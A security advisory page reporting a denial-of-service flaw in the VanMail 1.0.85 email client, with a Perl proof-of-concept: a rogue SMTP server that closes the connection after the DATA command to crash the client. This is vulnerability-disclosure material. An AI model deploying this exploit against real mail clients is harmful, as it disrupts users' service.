Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam  Beyond Security  SecuriTeam Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	VanMail DoS 31 Oct. 2005    Summary "VanMail is a powerful POP3/SMTP email client that puts you in control of what messages you want to receive." VanMail can be caused to crash when the response to SMTP DATA command is answered by the user closing the socket.   Credit: The information has been provided by Ziv Kamir.    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * VanMail version 1.0.85 Exploit: #!/usr/bin/perl ############################### # Gss-IT Research And Security Labs # ############################### # # # www.GssIT.com # # # ############################### # VanMail Ver 1.0.85 Denial Of Service PoC # ############################### # Use This PoC For Educational Purposes Only # ############################### use IO::Socket; use Net::hostent; use strict; my $port = "25"; my $server = IO::Socket::INET->new ( LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 5 ) or die "Couldn't create Smtp-Server.\n"; while (my $client = $server->accept())  {    $client->autoflush(1);    my $hostinfo = gethostbyaddr($client->peeraddr);  printf "=>Connect from %s<=\n", $hostinfo->name ;  print $client "220 Smtp-Server\r\n" ; # Banner    while ( <$client> )      {            print $_;            next unless /\S/;      if (/quit|exit/i) { last; }      elsif (/HELO/i ) { print $client "250 Smtp-Server\n"; }      elsif (/MAIL FROM/i ) { print $client "250 Ok\n"; }      elsif (/RCPT TO/i ) { print $client "250 Ok\n"; }      elsif (/DATA/i ) { print $client "354 Start\n";                                close $client; } # <==    }        close $client;      } #EoF  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability Citrix Broadcast Server login.asp SQL Injection Trend Micro HouseCall ActiveX Control Arbitrary Code Execution PGP Desktop PGPwded.sys Denial of Service Microsoft Hierarchical FlexGrid Control Integer Overflows (MS08-070) Microsoft Word Malformed FIB Arbitrary Free Vulnerability (MS08-072) CA ARCserve Backup LDBserver Vulnerability CA ARCserve Backup RPC "handle_t" Argument Vulnerability Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities Microsoft Internet Explorer HTML Tag Long File Name Extension Stack Buffer Overflow Vulnerability (MS08-073) Microsoft Windows Graphics Device Interface Integer Overflow Vulnerability (MS08-071) Microsoft Excel Malformed Object Memoy Corruption Vulnerability (MS08-074) Google Chrome MetaCharacter URI Obfuscation Vulnerability iPhone Configuration Web Utility for Windows Directory Traversal Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability  Featured Articles Roundcubemail PHP Arbitrary Code Injection Qemu and KVM VNC Server Remote DoS Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL Pointer Dereference Firefox Cross-Domain Text Theft Microsoft Word Malformed FIB Arbitrary Free Vulnerability (MS08-072) Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities Hacking SOHO Routers
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®